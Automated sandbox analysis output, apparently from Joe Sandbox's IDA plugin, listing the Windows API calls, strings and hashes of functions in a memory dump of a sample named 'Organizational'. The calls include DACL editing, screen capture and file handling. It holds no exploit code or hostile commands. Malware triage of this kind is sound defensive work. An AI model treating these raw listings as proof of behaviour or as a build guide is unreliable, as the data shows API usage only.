                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002B841D
                                                          • __swprintf.LIBCMT ref: 002B844D
                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 002B8479
                                                          • VariantInit.OLEAUT32(?), ref: 002B852A
                                                          • SysFreeString.OLEAUT32(?), ref: 002B85BE
                                                          • VariantClear.OLEAUT32(?), ref: 002B8618
                                                          • VariantClear.OLEAUT32(?), ref: 002B8627
                                                          • VariantInit.OLEAUT32(00000000), ref: 002B8665
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                          • API String ID: 3730832054-3931177956
                                                          • Opcode ID: af8ce8f5f0f624896c69f3f6f5469b164c08518de54748af09446ec88c0890ae
                                                          • Instruction ID: 17939b3d2d7d2ab4741c3a06226825e3fff989c51dd835dc811c026b122f05ca
                                                          • Opcode Fuzzy Hash: af8ce8f5f0f624896c69f3f6f5469b164c08518de54748af09446ec88c0890ae
                                                          • Instruction Fuzzy Hash: 0AD1E331624516DBDB209F65C894BAEB7FCFF04780F188195E409AB281DFB4EC64DBA1
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 002D4A61
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D4AAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: c0c0799f2b6243d522c8a1250755cb88d65ec15494232ad112a4f65496297089
                                                          • Instruction ID: c8b99c8e9e5e3e54043fea3a0d538a93109c62775a0a662200f625340a282e53
                                                          • Opcode Fuzzy Hash: c0c0799f2b6243d522c8a1250755cb88d65ec15494232ad112a4f65496297089
                                                          • Instruction Fuzzy Hash: 32918E342347019FCB14FF20C491A6EB7A1AF94358F14895AF8965B3A2CB31ED69CF85
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 002BE31F
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 002BE32F
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002BE33B
                                                          • __wsplitpath.LIBCMT ref: 002BE399
                                                          • _wcscat.LIBCMT ref: 002BE3B1
                                                          • _wcscat.LIBCMT ref: 002BE3C3
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002BE3D8
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002BE3EC
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002BE41E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002BE43F
                                                          • _wcscpy.LIBCMT ref: 002BE44B
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002BE48A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                          • String ID: *.*
                                                          • API String ID: 3566783562-438819550
                                                          • Opcode ID: 9123dd72545cf96f0b8957d8018f90a875ae47cf71687c27edf97fcae3a1d954
                                                          • Instruction ID: fe9ca01df818fbd4835e2f3da7d5e8626f5bfee4d36656b8e75e656cb7183c8f
                                                          • Opcode Fuzzy Hash: 9123dd72545cf96f0b8957d8018f90a875ae47cf71687c27edf97fcae3a1d954
                                                          • Instruction Fuzzy Hash: 396158725242459FCB10EF60C884AEEB3E8FF88354F04891EF98987251DB35E959CF96
                                                          APIs
                                                            • Part of subcall function 00251F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00252412,?,00000000,?,?,?,?,00251AA7,00000000,?), ref: 00251F76
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002524AF
                                                          • KillTimer.USER32(-00000001,?,?,?,?,00251AA7,00000000,?,?,00251EBE,?,?), ref: 0025254A
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0028BFE7
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00251AA7,00000000,?,?,00251EBE,?,?), ref: 0028C018
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00251AA7,00000000,?,?,00251EBE,?,?), ref: 0028C02F
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00251AA7,00000000,?,?,00251EBE,?,?), ref: 0028C04B
                                                          • DeleteObject.GDI32(00000000), ref: 0028C05D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID: h.
                                                          • API String ID: 641708696-3029464332
                                                          • Opcode ID: 867b28e3ecd561778af183dc87a597064771d0c030fac5b1d604349f77886f57
                                                          • Instruction ID: 06e6f1db53d92706a1f817aeaf2d0bcab84919fa564c159bf7b78e7eb65c5328
                                                          • Opcode Fuzzy Hash: 867b28e3ecd561778af183dc87a597064771d0c030fac5b1d604349f77886f57
                                                          • Instruction Fuzzy Hash: 1F61CF34135602DFCB26AF14DD8CB7677B1FB45312F148528E8425A9E0C3B0A8A9DFA4
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002BA2C2
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002BA2E3
                                                          • __swprintf.LIBCMT ref: 002BA33C
                                                          • __swprintf.LIBCMT ref: 002BA355
                                                          • _wprintf.LIBCMT ref: 002BA3FC
                                                          • _wprintf.LIBCMT ref: 002BA41A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-3080491070
                                                          • Opcode ID: 3802b61dd3cec9d3183a30ac6121046b0dbee1f466c8c7d8fc0ce93f198255c5
                                                          • Instruction ID: 38ed614e7bfee708deae4ccad3d10161030fab1caf505935055cbfbcaee7f625
                                                          • Opcode Fuzzy Hash: 3802b61dd3cec9d3183a30ac6121046b0dbee1f466c8c7d8fc0ce93f198255c5
                                                          • Instruction Fuzzy Hash: 5151AD71921249AACF15EBE0CD96EEEB7B8AF04340F144165F405A2092EB712FB9DF61
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0029F8B8,00000001,0000138C,00000001,00000000,00000001,?,002C3FF9,00000000), ref: 002B009A
• LoadStringW.USER32(00000000,?,0029F8B8,00000001), ref: 002B00A3
  • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
• GetModuleHandleW.KERNEL32(00000000,00317310,?,00000FFF,?,?,0029F8B8,00000001,0000138C,00000001,00000000,00000001,?,002C3FF9,00000000,00000001), ref: 002B00C5
• LoadStringW.USER32(00000000,?,0029F8B8,00000001), ref: 002B00C8
• __swprintf.LIBCMT ref: 002B0118
• __swprintf.LIBCMT ref: 002B0129
• _wprintf.LIBCMT ref: 002B01D2
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 002B01E9
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
• Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
• Opcode ID: 61cfb6c6073137a41be2f276c664bb0965b1111cfd1530357d2efaa9d3a6e6d0
• Instruction ID: 97a5d6818977a93d45293945e8eb6822f6f86be5299c5f95a217a4ea4038890d
• Opcode Fuzzy Hash: 61cfb6c6073137a41be2f276c664bb0965b1111cfd1530357d2efaa9d3a6e6d0
• Instruction Fuzzy Hash: 0B418E72811259AACF15EBE0DD96DEEB37CAF14341F140165F505B2092DA306FB9CFA1
APIs
  • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
  • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
• CharLowerBuffW.USER32(?,?), ref: 002BAA0E
• GetDriveTypeW.KERNEL32 ref: 002BAA5B
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BAAA3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BAADA
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BAB08
  • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
• Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: 6b2bf9cafb1c99b933b40a3d5a30af641b3f1d4ee8653881c441672a88bd171b
• Instruction ID: 94dfe4d57a5346fa8b03eb78fc56d5ca1264e8431b66a82e2ec4685b2aa606f1
• Opcode Fuzzy Hash: 6b2bf9cafb1c99b933b40a3d5a30af641b3f1d4ee8653881c441672a88bd171b
• Instruction Fuzzy Hash: B2517B711243059FC300EF20C8919AAB7F4FF98758F14896DF895972A1DB31AE69CF92
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002BA852
• __swprintf.LIBCMT ref: 002BA874
• CreateDirectoryW.KERNEL32(?,00000000), ref: 002BA8B1
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002BA8D6
• _memset.LIBCMT ref: 002BA8F5
• _wcsncpy.LIBCMT ref: 002BA931
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002BA966
• CloseHandle.KERNEL32(00000000), ref: 002BA971
• RemoveDirectoryW.KERNEL32(?), ref: 002BA97A
• CloseHandle.KERNEL32(00000000), ref: 002BA984
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
• Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: deba502f54c5d53a2b8327a4ec43bc0c0844b0ab14da3e9fd9f0ed6a3fda667c
• Instruction ID: 0e8d12ba7f896e2e6429017e6cf68b99e2cb9f3e70f441cc607e7f0fec0cbfdf
• Opcode Fuzzy Hash: deba502f54c5d53a2b8327a4ec43bc0c0844b0ab14da3e9fd9f0ed6a3fda667c
• Instruction Fuzzy Hash: 5C31D47155014AABDB21DFA0DC88FEF73BCEF88740F1041B6F909D6060E77096958B25
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002D982C,?,?), ref: 002DC0C8
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC0DF
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC0EA
• CloseHandle.KERNEL32(00000000,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC0F7
• GlobalLock.KERNEL32(00000000), ref: 002DC100
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC10F
• GlobalUnlock.KERNEL32(00000000), ref: 002DC118
• CloseHandle.KERNEL32(00000000,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC11F
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC130
• OleLoadPicture.OLEAUT32(?,00000000,00000000,002E3C7C,?), ref: 002DC149
• GlobalFree.KERNEL32(00000000), ref: 002DC159
• GetObjectW.GDI32(00000000,00000018,?), ref: 002DC17D
• CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 002DC1A8
• DeleteObject.GDI32(00000000), ref: 002DC1D0
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002DC1E6
Memory Dump Source
• Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
• Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 61348e2a0fa5a44e45ba119e5fd13079c1e1081ca089d43657a3855f38fb0636
• Instruction ID: 4c41ceb5c90eef1d492128438ecef0acead2ff6ed85e91530aaa01347d745750
• Opcode Fuzzy Hash: 61348e2a0fa5a44e45ba119e5fd13079c1e1081ca089d43657a3855f38fb0636
• Instruction Fuzzy Hash: 50415A71540249EFCB118F65ECCCEAE7BB8EB89711F104059F909EB260CBB19D82DB60
APIs
  • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002DC8A4
• GetFocus.USER32 ref: 002DC8B4
• GetDlgCtrlID.USER32(00000000), ref: 002DC8BF
• _memset.LIBCMT ref: 002DC9EA
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002DCA15
• GetMenuItemCount.USER32(?), ref: 002DCA35
• GetMenuItemID.USER32(?,00000000), ref: 002DCA48
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002DCA7C
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002DCAC4
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002DCAFC
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002DCB31
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
• Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: 168e25b8fff31e13ee94a9e9f72cfd29c6dc76f2d969d0bff79cd667fe480161
• Instruction ID: 0b6f86d0e67dcd3a6d4ec68370b762c5c629fb2c125d7154c9b4db95c376d50e
• Opcode Fuzzy Hash: 168e25b8fff31e13ee94a9e9f72cfd29c6dc76f2d969d0bff79cd667fe480161
• Instruction Fuzzy Hash: F9816A702283429FD711CF14D889AAABBE8FB88314F20452EF98597391C770DD65CFA2
APIs
  • Part of subcall function 002A8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A8E3C
  • Part of subcall function 002A8E20: GetLastError.KERNEL32(?,002A8900,?,?,?), ref: 002A8E46
  • Part of subcall function 002A8E20: GetProcessHeap.KERNEL32(00000008,?,?,002A8900,?,?,?), ref: 002A8E55
  • Part of subcall function 002A8E20: HeapAlloc.KERNEL32(00000000,?,002A8900,?,?,?), ref: 002A8E5C
  • Part of subcall function 002A8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A8E73
  • Part of subcall function 002A8EBD: GetProcessHeap.KERNEL32(00000008,002A8916,00000000,00000000,?,002A8916,?), ref: 002A8EC9
  • Part of subcall function 002A8EBD: HeapAlloc.KERNEL32(00000000,?,002A8916,?), ref: 002A8ED0
  • Part of subcall function 002A8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002A8916,?), ref: 002A8EE1
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002A8B2E
• _memset.LIBCMT ref: 002A8B43
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002A8B62
• GetLengthSid.ADVAPI32(?), ref: 002A8B73
• GetAce.ADVAPI32(?,00000000,?), ref: 002A8BB0
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002A8BCC
• GetLengthSid.ADVAPI32(?), ref: 002A8BE9
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002A8BF8
• HeapAlloc.KERNEL32(00000000), ref: 002A8BFF
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 002A8C20
• CopySid.ADVAPI32(00000000), ref: 002A8C27
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002A8C58
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002A8C7E
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 002A8C92
Memory Dump Source
• Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
• Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
• Opcode ID: cf879fa1807379a672eb486fac7dfec12b23619bdb1e025e1dcb21e8a0145a58
• Instruction ID: b1391c1ba70754b97c903ce9fdf75fa168726b3196d750f3b973ea6aecb8886e
• Opcode Fuzzy Hash: cf879fa1807379a672eb486fac7dfec12b23619bdb1e025e1dcb21e8a0145a58
• Instruction Fuzzy Hash: CD615A7191020AAFDF14DFA0DC88EAEBB79FF05310F04815AF915AA290DF719A25CF60
APIs
• GetDC.USER32(00000000), ref: 002C7A79
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002C7A85
• CreateCompatibleDC.GDI32(?), ref: 002C7A91
• SelectObject.GDI32(00000000,?), ref: 002C7A9E
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002C7AF2
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 002C7B2E
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002C7B52
• SelectObject.GDI32(00000006,?), ref: 002C7B5A
• DeleteObject.GDI32(?), ref: 002C7B63
• DeleteDC.GDI32(00000006), ref: 002C7B6A
• ReleaseDC.USER32(00000000,?), ref: 002C7B75
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
• Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 9b4ca373718dcf052696e3d3c6d14e67dc08dea40e5b2bb4e84b8007c6c61842
• Instruction ID: 3763337f57b95770b8cbdf2d9f34e676f944971b9b1348b763b27a2ac39577ad
• Opcode Fuzzy Hash: 9b4ca373718dcf052696e3d3c6d14e67dc08dea40e5b2bb4e84b8007c6c61842
• Instruction Fuzzy Hash: 9D516771954209EFCB14CFA8DC88FAEBBB9EF48310F14851DF94AAB210D771A9518F60
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002BA4D4
  • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
• LoadStringW.USER32(?,?,00000FFF,?), ref: 002BA4F6
• __swprintf.LIBCMT ref: 002BA54F
• __swprintf.LIBCMT ref: 002BA568
• _wprintf.LIBCMT ref: 002BA61E
• _wprintf.LIBCMT ref: 002BA63C
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
• Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-2391861430
• Opcode ID: 6c3c8453394acb1037ec04dfe4665e672dc3187baf49f0b1735285aaaad4dea5
• Instruction ID: 40ef283b0e0127656bc4913daee0e2b41adedd9d5ac7ea18e92cbe6786212846
• Opcode Fuzzy Hash: 6c3c8453394acb1037ec04dfe4665e672dc3187baf49f0b1735285aaaad4dea5
• Instruction Fuzzy Hash: 9551BF71821149ABCF15EBE0CD86EEEB778AF04340F184165F505A20A2DB312FB9CF61
                                                          APIs
                                                            • Part of subcall function 002B951A: __time64.LIBCMT ref: 002B9524
                                                            • Part of subcall function 00264A8C: _fseek.LIBCMT ref: 00264AA4
                                                          • __wsplitpath.LIBCMT ref: 002B97EF
                                                            • Part of subcall function 0027431E: __wsplitpath_helper.LIBCMT ref: 0027435E
                                                          • _wcscpy.LIBCMT ref: 002B9802
                                                          • _wcscat.LIBCMT ref: 002B9815
                                                          • __wsplitpath.LIBCMT ref: 002B983A
                                                          • _wcscat.LIBCMT ref: 002B9850
                                                          • _wcscat.LIBCMT ref: 002B9863
                                                            • Part of subcall function 002B9560: _memmove.LIBCMT ref: 002B9599
                                                            • Part of subcall function 002B9560: _memmove.LIBCMT ref: 002B95A8
                                                          • _wcscmp.LIBCMT ref: 002B97AA
                                                            • Part of subcall function 002B9CF1: _wcscmp.LIBCMT ref: 002B9DE1
                                                            • Part of subcall function 002B9CF1: _wcscmp.LIBCMT ref: 002B9DF4
